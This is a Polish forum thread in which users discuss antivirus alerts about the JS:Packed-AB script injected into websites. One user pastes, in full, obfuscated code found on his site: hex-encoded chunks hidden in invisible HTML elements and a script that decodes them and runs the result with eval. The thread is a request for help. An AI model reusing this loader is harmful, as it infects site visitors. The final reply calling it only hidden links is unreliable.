Wirus na stronie

[mathie]

Niedawno avast wykrywał mi trojana na PiO

Nowy niebezpieczny malware JS:Packed-AB [Trj] wykryty przez avast!

18. stycznia - W piątek 16. stycznia, wiele stron internetowych na całym świecie stało się celem ataku. W wielu witrynach internetowych pojawił się złośliwy skrypt, który przekierowuje użytkowników na serwery zarządzane przez twórców ataku. W związku z tym wiele komputerów zostało zainfekowanych. avast! wykrywa ten złośliwy skrypt jako JS:Packed-AB [Trj]. Podczas ostatnich 48 godzin zabserwowaliśmy niemal 5000 ataków, które zostały wykryte na ponad 2000 stron na całym świecie.

[advokat]

NOD też blokował mi wczoraj wejście na forum.

[Maximus Marius]

Może znowu ktoś ma avatara z domeny zawirusowane - to jezeli chodzi o blokowanie forum

[seead]

wczoraj kaspersky mi krzyczał:

i wszędzie gdzie chciało na pio wejść tak samo

strona się otwierała i wyskakiwał kominukat kasperskiego o niebezpieczeństwie więc dawałem zawsze "zabloku" i potem powyższy komunikat w przeglądarce

dzisiaj już ok jest - przynajmniej narazie

[Mion]

Napisałem program do wykrywania modyfikacji kodu strony po przez dodanie linków: Hack Site Info

[Mar]

@Mion, akurat w tym wypadku to jest coś całkiem innego, doklejane do kodu jest funkcja:

function c2621718dci49d495462a971(i49d495462ad4a){ f....

a tego chyba Twój program nie sprawdza, chyba, że to dodałeś.

Mar.

[Mion]

W tej darmowej wersji nie, ale przewiduje napisanie bardziej rozbudowanego i monitorującego na bieżąco w zasobniku, bo jak widać zagrożenie cały czas jest niestety realne

[xavi1984]

ta sama historia

[Andrzej333]

Witam

Ostatnio na mojej stronie pojawil sie ten kod, mozliwe ze jest to virus, prawdopodobienstwo jest takie ze hasla zostaly wykradzione przez total commander

Prosze o sprawdzenie:

							<div id='x0198108c5f9f8ac5eb07f262c5556b3b4'><style>.qgvju{display:none}</style><h4 class='qgvju'  id='__206'>66756e6374696f6e2072696f4551732863464d48297b66756e6374696f6e2064705158457133
28686a787531297b7661722078536f6e633d303b766172207872335950573d686a7875312e6c656e6
774682c2074516a683d303b7768696c652874516a683c787233595057297b78536f6e632b3d6f3634
7128686a7875312c74516a68292a7872335950573b74516a682b2b3b7d72657475726e202878536f6
e632b2727293b7d66756e6374696f6e206f36347128715775592c694a79384442297b72657475726e
20715775592e63686172436f6465417428694a79384442293b7d202020747279207b7661722069373
9656d3d6576616c2827</h4><h5 id='__dfe3'  class='qgvju'>613a7235677b757b6d3f653f6e3f7435733f2e3a633561266c3f6c3f653f6535272e7265706c
616365282f5b5c3f5c3a26355c7b5d2f672c20272729292c76747066564c3d27272c775856353d302
c6f5149676261573d303b7661722068476c366f3d286e657720537472696e6728693739656d29292e
7265706c616365282f5b5e40612d7a302d39412d5a5f2e2c2d5d2f672c2727293b766172206b44764
13d647051584571332868476c366f293b63464d483d756e6573636170652863464d48293b666f7228
7661722079584c543d303b2079584c54203c202863464d482e6c656e677468293b2079584c542b2b2
97b766172207469316a</h5><h4 id='__8ecf' class='qgvju'>643d6f3634712868476c366f2c77585635295e6f363471286b4476412c6f514967626157293b
76617220665457433d6f3634712863464d482c79584c54293b775856352b2b2c6f5149676261572b2
b3b76747066564c2b3d537472696e672e66726f6d43686172436f646528665457435e7469316a6429
3b6966286f5149676261573e6b4476412e6c656e677468296f5149676261573d303b6966287758563
53e68476c366f2e6c656e67746829775856353d303b7d6576616c2876747066564c293b2072657475
726e2076747066564c3d6e657720537472696e6728293b7d63617463682865297b7d7d72696f45517
3282725333225333825</h4><h5 id='__aec'  class='qgvju'>3333253339253332253336253335253330253532253062253336253138253362253130253131
253135253535253631253266253330253636253061253237253331253039253066253230253234253
437253162253065253263253731253332253265253031253337253663253635253635253630253335
253031253361253161253137253761253234253335253235253162253135253466253739253538253
466253364253236253234253230253730253737253033253339253765253764253336253263253762
253333253431253065253336253630253739253335253334253339253235253239253334253336253
2342536352532372536</h5><div class='qgvju'  id='__3a39'>6525306325303425313325313125306525333925373325333225333225373325373525376125
343825326125323525333225376425366325326325343425373825303025336525336525373025343
225343925343625376225346525343525376425363125376525363525323325323825333325363825
366525363025373625373725373825363725323425326125363425306425333125336525376325333
225336225363725363325313225316225306625373125336325316125323525366225313525353525
356225373725373325363625336625333425326525313125366225336525373925326625303925333
9253265253131253039</div><h4 id='__0fe'  class='qgvju'>2532302531372531612532322533642535622536322532652534622535322535332536372536
382536352537332536302533622536652536312534622532642533382533352533342533662533342
532322532352534662536382530652530382533362536622537392537362533332535612532392537
342530322537612537622537342532652533392535622537392533612533612532382533642533322
536332533322530632533362536312531622536372537662534662535352533622535392534642534
372532362532392533352537392534362535372534352537302537322534342537642532632533652
5333425373625323025</h4><font id='__f180' class='qgvju'>3362253761253065253336253339253235253335253330253030253332253338253333253738
253263253266253762253764253063253665253766253633253765253733253231253338253139253
132253331253332253632253630253633253537253333253461253262253734253764253664253730
253736253266253237253336253530253062253632253032253363253336253066253537253532253
032253639253366253031253339253630253734253334253133253633253139253233253761253730
253232253361253362253262253063253334253330253166253163253331253633253630253233253
0302532342532332530</font><font id='__051a'  class='qgvju'>3325313325303125363525366225343425326225303325326625323725313525313425376325
306125323125316325336325323225336325363025353025356125303725333325306625323325333
825333325363725333625376125373325376425343225323225323225353425333925333925363825
326625366225336225353925326125366325373125333725363925366325356325343525353525323
025373225356425353525363725373125363625323925376325376625373825373925303725333325
313425373125353525326525326425376525316125353725313825333125366525373625306325303
9253334253064253035</font><span class='qgvju' id='__c86d'>2536302537632537372537652532302537392532662530612533392536652531642536382533
622534622531332534632536642536372537382537322537622534312536392536642537622536662
531372533312532362536612533352533632532652537362533362535622535312534642532642535
352536662536392533652537622537662537302530622535322535612533332537372531372532372
531342533332530302536632534342531612533372532302532352537342533662530382531362530
382532322537312532392536382532662533382536632531612533372536392533342531622533382
5326325373025333125</span><div class='qgvju' id='__3e8e'>3366253462253330253361253239253336253331253036253461253239253031253762253766
253762253665253336253237253331253233253234253130253661253339253736253361253638253
333253239253037253336253634253432253561253332253336253335253030253161253665253332
253333253731253736253762253332253336253163253134253537253361253237253335253330253
631253633253466253361253366253334253335253033253065253239253364253665253131253131
253338253239253730253735253337253338253033253239253339253661253133253163253132253
3362532332530632536</div><h4 class='qgvju' id='__3c0'>3525363025323825366425333325373725303325323925323725333825376525373925333225
363425333325363925336225313725373525333525306125303325336625373425323325323025343
625336325313025333725323325333025366125373425333225313325303625323625306625363025
323825336225373425373525343525366425343925363125363725376525373425333625353925363
025353525363925356225373625333825336125333925373325353925323625336525326425366625
323425363825373625326625333825336425373025373625366225366625306525303825303225353
4253438253732253739</h4><font class='qgvju'  id='__495'>2537362537352536322536622536322530622533392530382533642532372533342537382533
362533662530662533332533342537352537632537662533622532312532342530392531352532342
531382537302532382534312536652532332532302535652533652533392530612530612531302530
382533352532352532652530662537612537322537332536632536372530652534332533352533322
531642532362533322531392531612536392532382530352532392537622537312536382533652532
392532612534332536612533312533322537632537652537372533662532342531632536342532622
5326625336225333925</font><font id='__937b'  class='qgvju'>3730253638253765253161253761253733253237253263253336253333253233253762253534
253730253338253333253238253361253265253166253362253436253231253735253733253233253
233253232253762253466253635253635253339253061253164253237253735253234253764253664
253331253362253636253331253532253730253063253731253435253239253330253262253430253
234253666253363253731253336253730253737253131253062253732253638253636253433253063
253135253635253736253263253039253336253633253332253533253062253132253234253063253
6632535342536332533</font><div class='qgvju'  id='__789'>6225343325323225303225353225343925333825316525323725306425356425306625336125
336425323925343525323025373225303025366625316125376625363525316525353525366325373
025313525313125343225313625333125373125366125306625363125363525343325366325326625
333525306625313325316625333025336125356125366225303225306125306125356325333525353
625356425353625306425353825343725376425353325353225353625366125303425336525323525
376125326125336625336225326225306525333525323925336325313425316625313725326625373
6253766253464253538</div><font class='qgvju'  id='__4a7'>2532622531332536662535622536362534382537302530322532632533312530332534372532
662534622536302530632530362532372532622535632532622531302535622532632537382532662
533372532342532632537362533362537652535662532612536312537332537632536322533382533
642531312531622531642530342536342533622533342533312536622533652533322534382537312
537322530652535362537652537372537302534622537642530302533302532372534352530652531
372532332533352537392530312536382537322533612532382532382533362531332533362531352
5376225313425373225</font><font id='__eb42' class='qgvju'>3332253237253335253066253466253661253764253365253263253234253234253336253237
253361253739253038253736253661253337253462253365253164253239253332253739253763253
766253663253238253231253363253262253332253133253737253334253731253165253632253333
253335253032253037253062253638253235253562253264253731253336253561253362253735253
761253632253263253336253161253163253065253661253363253361253137253664253330253766
253163253132253236253031253065253266253633253362253734253763253561253633253632253
3312533612531342531</font><div id='__e79c' class='qgvju'>3625336125333625313225343925363325316125323225303425323025363225336225323925
376525333725376125313925373325363425373225373825303725373025373025363125313125373
425373225313225323225316325313225316125333725303825316425376425373025366625356625
373425316525333525313425333625346325303025333625316425343225366525373225363625363
925373525323625323125316525326225303825333925376625376525356425303025306425353625
313025313625326225323925336625346525336125373625353825363025326525333425376325326
1253263253361253264</div><h5 class='qgvju' id='__8fb'>2531622533302533662530372532372531392536392532642533332530302533622537352533
332530302533312532642536332532312535632530342530332530642532342532662533382533362
533362534332532342537382532612533382532622536302532332536652534332532642530302533
632530372532622532382537332530632537392535652533312531662537662533622532382532322
532312531342532342532662530322530342532652532632533372533612531392533392533662536
372536612537642533652532662536382535372533372532302530622532322534332533332532372
5303825316325376525</h5><div id='__09c' class='qgvju'>3039253033253235253737253633253638253236253031253230253161253262253035253732
253231253733253332253164253165253363253365253339253564253262253332253165253163253
732253333253137253635253334253237253261253232253563253338253630253635253337253336
253336253064253330253031253336253661253264253765253630253636253737253765253566253
237253366253735253333253734253739253361253333253061253363253634253738253164253336
253261253263253334253461253737253330253639253335253333253731253638253762253162253
1392534662536392532</div><div id='__c5e'  class='qgvju'>6625313825343025366625363325343425333225353425313425336225323725373725333225
363125313825303025316225316625313825373625323925363125333125303625326425303425363
925323225333525326225323625333825356225363725373525373725326327293b</div><h5 id='__9653' class='qgvju'></h5><script>var HexChars = "0123456789ABCDEF";function h2d(HexVal){HexVal=HexVal.toUpperCase();var DecVal=0;var HV1=HexVal.substring(0,1);DecVal=(HexChars.indexOf(HV1)*16);HV1=HexVal.substring(1);DecVal+=HexChars.indexOf(HV1);return String.fromCharCode(DecVal);}var s=''; var o=Array('__206','__dfe3','__8ecf','__aec','__3a39','__0fe','__f180','__051a','__c86d','__3e8e','__3c0','__495','__937b','__789','__4a7','__eb42','__e79c','__8fb','__09c','__c5e','__9653'); for(var i in o) s+=document.getElementById(o[i]).innerHTML; var ss=''; for(var i=0; i <s.length; i+=2) ss+=h2d(s.substr(i,2)); eval(ss);</script></div>

[nocentis]

czy twoja strona działa na cms typu joomla ?

p.s

nowy problem = nowy wątek .

[Mar]

@Andrzej333 to raczej nie wirus a dziura w skrypcie i ktoś dokleił do niego linki na ukrytej warstwie, tak to przynajmniej wygląda.

Mar.